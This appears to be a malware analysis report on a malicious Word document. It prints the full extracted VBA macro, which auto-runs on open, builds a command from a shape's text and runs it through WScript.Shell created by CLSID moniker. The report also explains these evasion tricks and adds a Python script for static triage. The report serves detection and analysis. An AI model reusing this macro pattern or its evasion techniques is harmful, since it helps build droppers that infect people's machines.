Verdict: MALICIOUS (risk score 232)

Malware Insights

MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic
The sample contains a VBA macro with an AutoOpen entry point that runs a command line. The command itself is not present in the macro source: it is assembled at run time by concatenating the text of a document shape (Shapes("pOlvcnLMEQjF").TextFrame.TextRange.Text) with several variables, and handed to an object created with GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8"). That CLSID is WScript.Shell, so the .Run call is a shell execution in which neither the string "WScript.Shell" nor CreateObject ever appears in the code (the "new:" moniker instantiates a COM class directly by CLSID). The many Select Case blocks switch on variables that are never assigned and compare them against large constants that can never match; they are padding with randomly generated names. Taken together with the cmd.exe heuristic hit, this is consistent with a downloader or dropper, but the actual command and any URLs live in the shape text, which this report did not recover, so the download behaviour should be confirmed by extracting that shape's text or by running the sample dynamically.
Heuristics (9)

- ClamAV: Doc.Malware.Sagent-6813871-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6813871-0.
- Suspicious cmd.exe invocation with execution flag [high] (SC_STR_CMD).
- VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings): document contains VBA macro code.
- GetObject call [high] (OLE_VBA_GETOBJ). Matched lines in script:
  End Select
  Set ndKtkQv = GetObject(aViNGFjH + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + jfwqG)
  On Error Resume Next
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN). Matched lines in script:
  Attribute VB_Customizable = True
  Sub AutoOpen()
  On Error Resume Next
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note: this canned description does not fit this sample, where a VBA project was recovered as macros.bas below; treat the hit as overlapping with OLE_VBA_AUTOOPEN rather than as independent evidence.)
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace present in any Office document with drawing content and is not an indicator; no attacker-controlled URL was recovered.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5742 bytes |

SHA-256: aedacd7e282f64b6d7178c16f25db2287c8439c417be4c9358a02ef71a877310

Detection (macros.bas):
- ClamAV: no threats found (the Doc.Malware.Sagent-6813871-0 hit above is on the parent document, not on the extracted source).
- Obfuscation or payload: likely. 91 of 147 identifiers look randomly generated (e.g. 'jXVvYtOSvkzz'), consistent with name-mangling obfuscation.
Script preview (first 1,000 lines of the extracted macros.bas):
Attribute VB_Name = "jXVvYtOSvkzz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case vHbqjzq
Case 302725929
QiIZwh = 261928046
HUFwnG = CLng(166584178)
Case 280890079
wYrcCtjn = Oct(tvfoq)
UifKuV = FjzaR
Case 21230282
IACzrBS = CDate(nOoYm)
oriSdoiI = Int(179586883 * wSsSKf)
End Select
On Error Resume Next
Select Case jdBWRTp
Case 116921515
ATGcYh = 341377692
jfJdHbV = CLng(276448663)
Case 74708770
wZlhPtdp = Oct(zVqSWaP)
cravHpni = jwbBjjG
Case 204895382
raTEMzjCC = CDate(tMnDs)
twksrkww = Int(245725438 * jNdRo)
End Select
On Error Resume Next
Select Case OmfRiG
Case 97475170
haLwF = 188657891
qhBTj = CLng(297233802)
Case 271834843
dqRPLFN = Oct(MLzoj)
GGIuXZusX = qBqEvv
Case 185280007
YOCbNrD = CDate(TQwmGobAa)
KmVPdkSAZ = Int(65111219 * IORjYP)
End Select
Set ftRqbGiu = Shapes("pOlvcnLMEQjF")
On Error Resume Next
Select Case vubMiddQi
Case 230556574
stKAlaaWu = 63475444
hoCIN = CLng(120094517)
Case 190011316
YUswwOXi = Oct(NtTuvOmAJ)
vvwKF = nNmKaQLn
Case 270736379
iAvMlN = CDate(aIBqNmaPH)
LhtbJ = Int(258912727 * KBkUZ)
End Select
On Error Resume Next
Select Case MkZYZGki
Case 166386747
BOZTv = 240781802
XUpkm = CLng(113599619)
Case 170814409
SQGIFB = Oct(MdYRKEC)
bklzAdCiK = wXlSz
Case 175220290
zEGqda = CDate(IYBwvi)
zUZOzAR = Int(170097540 * PhvBJiqui)
End Select
On Error Resume Next
Select Case XwlnEvP
Case 244736724
NtTop = 846523
wirmJs = CLng(176322135)
Case 180900483
iNSDwCDRn = Oct(jdLTZBE)
NEzUFPD = wmDUiV
Case 64366555
WiwhLKqBA = CDate(QokLRl)
TNWzN = Int(49577694 * AjGQO)
End Select
ujJbDvPR = "" + TUzrFX + OvUqw + lVRQLIm + ftRqbGiu.TextFrame.TextRange.Text + athfD + hTCUQNaj + JIEsQ + AUvwCjF
On Error Resume Next
Select Case zAKUiGCo
Case 161882589
XuBRJ = 110841253
mwGbw = CLng(237881028)
Case 115353838
joJrJPfEu = Oct(djKFrkzA)
wwXsK = zHKkKwQt
Case 195538711
RswOqsqHf = CDate(kzjHVbzj)
tJvzMMI = Int(140591649 * knMmjI)
End Select
On Error Resume Next
Select Case wSjfh
Case 244841668
VKziCVkJo = 117201747
zunYS = CLng(277456066)
Case 340572131
PVFri = Oct(EdfFcn)
BBNKUdfz = rzKHzZQ
Case 168417067
tfcVW = CDate(TONzrE)
LiXvs = Int(170877653 * zMTHui)
End Select
Set ndKtkQv = GetObject(aViNGFjH + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + jfwqG)
On Error Resume Next
Select Case FnrDSXPb
Case 120137855
JHUoTOmL = 244161218
UzAllzb = CLng(135077707)
Case 48915476
waciK = Oct(kUYYVZL)
MtVci = IrRTR
Case 49447877
FRVwvUOr = CDate(fpiuiSmM)
umzYs = Int(183938782 * qzvFJJNCm)
End Select
On Error Resume Next
Select Case zdJfUlcXE
Case 289920356
VbdaV = 129466248
iiBmuwvw = CLng(331496348)
Case 95127897
UamuLClZ = Oct(LDNPq)
tjisiflN = CvLjM
Case 236787184
mOmjRPa = CDate(bpvOWf)
mvHDOT = Int(38142965 * GjNfsPrC)
End Select
Const NRsBilV = 0
On Error Resume Next
Select Case HHcbC
Case 341665938
jUwFStYN = 219853738
BiJNS = CLng(333961959)
Case 174234950
kOwsjKpf = Oct(atHLjsti)
MiUfisHsU = OppIBmSl
Case 283045593
kmQmMwUZq = CDate(mPjTmrU)
fElrp = Int(54604621 * rkkGZN)
End Select
ndKtkQv.Run@ ujJbDvPR, NRsBilV
On Error Resume Next
Select Case IzAPhTdJM
Case 326335513
oOkrPlK = 103001967
kdcKGC = CLng(23139221)
Case 38783127
BlwWWIIiz = Oct(miPbnY)
pFzwiZzCL = WpIiQXO
Case 70413592
YRrbik = CDate(wdbVCpmO)
zGwTLw = Int(127388358 * dmoojV)
End Select
On Error Resume Next
Select Case BFkuSDu
Case 223818561
aabRjUS = 307904585
OKVqSS = CLng(33886513)
Case 15298314
bkSRwGLwq = Oct(FtEWmM)
KNznVQiR = hzKmSp
Case 105026759
SzHJi = CDate(FjdGpXJ)
jdfHrELG = Int(130599209 * AiYMlEsQ)
End Select
On Error Resume Next
Select Case wGdiw
Case 29005930
iSSHqKmVl = 312477297
GSvPAvIVJ = CLng(28555733)
Case 235332298
zmzTUCSSw = Oct(bfGbBtjlh)
DNAwOjFhV = vtwUSUt
Case 284134565
SSdBNq = CDate(JZtOlX)
tulmAFl = Int(317965065 * wVwihlIh)
End Select
End Sub
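The chain described under Malware Insights (AutoOpen, command text pulled from a document shape, WScript.Shell created by CLSID moniker, .Run) can be confirmed statically from the extracted source without executing the document. The script below is an added example for this report, not the analyzer's own code. It is standard-library Python working on decoded VBA such as macros.bas above; the constructed sample input is an excerpt of that macro with the padding Select Case blocks reduced to one. The CLSID-to-ProgID table is hard-coded here for illustration (on a Windows host the authoritative mapping is under HKCR\CLSID\{...}), and the identifier-randomness heuristic is a simple one of my own, not the analyzer's, so its numbers differ from the report's 91 of 147.

```python
"""Static triage of extracted VBA for the AutoOpen -> shape text -> GetObject("new:CLSID").Run chain.

Added example for this report, not the analyzer's own code. Standard library only.
"""
import re
from typing import Dict

# CLSIDs resolved by the triage. The first is the one used by the sample above;
# the others are commonly abused automation objects, included for illustration.
KNOWN_CLSIDS: Dict[str, str] = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell",
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
}
SHELL_OBJECTS = {"WScript.Shell", "Shell.Application"}

# Sub AutoOpen() and other auto-execution entry points.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(AutoOpen|AutoExec|AutoClose|AutoNew|Document_Open|Workbook_Open|Auto_Open)\b",
    re.I | re.M,
)
# Set <var> = GetObject(... "new:<CLSID>" ...): instantiation by moniker, no ProgID in the source.
MONIKER_RE = re.compile(r'Set\s+(\w+)\s*=\s*GetObject\s*\([^)\n]*?"new:([0-9A-Fa-f-]{36})"', re.I)
# Set <var> = Shapes("<name>"): handle to a drawing shape whose text carries the payload.
SHAPE_RE = re.compile(r'Set\s+(\w+)\s*=\s*(?:\w+\.)?Shapes\s*\(\s*"([^"]+)"\s*\)', re.I)
# <obj>.Run <arg>: the optional '@' is a VBA type-declaration character abused as obfuscation.
RUN_RE = re.compile(r"\b(\w+)\.Run[@!#$%&^]?\s*\(?\s*(\w+)", re.I)
STRING_RE = re.compile(r'"[^"\n]*"')
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
# VBA keywords, conversion functions and Office object-model names that are not author-chosen identifiers.
VBA_NOISE = {
    "attribute", "sub", "function", "end", "on", "error", "resume", "next", "goto", "select", "case",
    "set", "const", "dim", "as", "if", "then", "else", "elseif", "for", "to", "each", "in", "loop",
    "do", "while", "wend", "with", "true", "false", "nothing", "call", "let", "private", "public",
    "byval", "byref", "and", "or", "not", "new", "exit", "is", "string", "long", "integer", "variant",
    "object", "clng", "cdate", "cstr", "cint", "oct", "hex", "int", "chr", "asc", "mid", "len",
    "replace", "split", "join", "getobject", "createobject", "shapes", "textframe", "textrange",
    "text", "run", "activedocument", "thisdocument",
}

# Constructed sample: excerpt of the macros.bas shown above, padding reduced to one block.
SAMPLE_VBA = '''Attribute VB_Name = "jXVvYtOSvkzz"
Sub AutoOpen()
On Error Resume Next
Select Case vHbqjzq
Case 302725929
QiIZwh = 261928046
HUFwnG = CLng(166584178)
Case 280890079
wYrcCtjn = Oct(tvfoq)
UifKuV = FjzaR
Case 21230282
IACzrBS = CDate(nOoYm)
oriSdoiI = Int(179586883 * wSsSKf)
End Select
Set ftRqbGiu = Shapes("pOlvcnLMEQjF")
ujJbDvPR = "" + TUzrFX + OvUqw + lVRQLIm + ftRqbGiu.TextFrame.TextRange.Text + athfD + hTCUQNaj + JIEsQ + AUvwCjF
Set ndKtkQv = GetObject(aViNGFjH + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + jfwqG)
Const NRsBilV = 0
ndKtkQv.Run@ ujJbDvPR, NRsBilV
End Sub
'''


def looks_random(name: str) -> bool:
    """Crude name-mangling heuristic: almost no vowels, or many case flips with few vowels."""
    if len(name) < 5:
        return False
    vowel_ratio = sum(c in "aeiouAEIOU" for c in name) / len(name)
    flips = sum(1 for a, b in zip(name, name[1:])
                if a.isalpha() and b.isalpha() and a.islower() != b.islower())
    return vowel_ratio < 0.25 or (flips >= 4 and vowel_ratio < 0.4)


def identifier_stats(src: str) -> Dict[str, object]:
    """Count author-chosen identifiers and how many of them look machine-generated."""
    code = STRING_RE.sub('""', src)  # string literals are not identifiers
    names = {t for t in IDENT_RE.findall(code)
             if t.lower() not in VBA_NOISE and not t.lower().startswith("vb_")}
    random_names = sorted(n for n in names if looks_random(n))
    return {"total": len(names), "random": len(random_names), "examples": random_names[:5]}


def triage_vba(src: str) -> Dict[str, object]:
    """Resolve CLSID monikers, trace shape text into .Run arguments, and report the chain."""
    entry_points = [m.group(1) for m in AUTOEXEC_RE.finditer(src)]
    objects = {var: KNOWN_CLSIDS.get(clsid.upper(), "unknown CLSID " + clsid)
               for var, clsid in MONIKER_RE.findall(src)}
    shapes = dict(SHAPE_RE.findall(src))
    tainted = set()  # variables assigned from a shape's TextFrame.TextRange.Text
    for handle in shapes:
        taint_re = re.compile(rf"^\s*(\w+)\s*=.*\b{re.escape(handle)}\.TextFrame\.TextRange\.Text\b",
                              re.I | re.M)
        tainted.update(taint_re.findall(src))
    runs = [{"object": objects.get(obj, obj), "argument": arg,
             "argument_from_shape_text": arg in tainted}
            for obj, arg in RUN_RE.findall(src)]
    chain = bool(entry_points) and any(
        r["object"] in SHELL_OBJECTS and r["argument_from_shape_text"] for r in runs)
    return {"entry_points": entry_points, "com_objects": objects, "shapes": shapes,
            "runs": runs, "shape_text_to_shell_chain": chain, "identifiers": identifier_stats(src)}


if __name__ == "__main__":
    import json
    print(json.dumps(triage_vba(SAMPLE_VBA), indent=2))
```

Running it on the excerpt reports the AutoOpen entry point, resolves ndKtkQv to WScript.Shell, and marks the .Run argument ujJbDvPR as derived from shape pOlvcnLMEQjF, which is exactly the evidence the Malware Insights rely on. The shape name is also the next pivot: a follow-up step is to pull that shape's text out of the document (oletools/olevba does not do this for you) to recover the real command line, since nothing in the macro source shows what is executed.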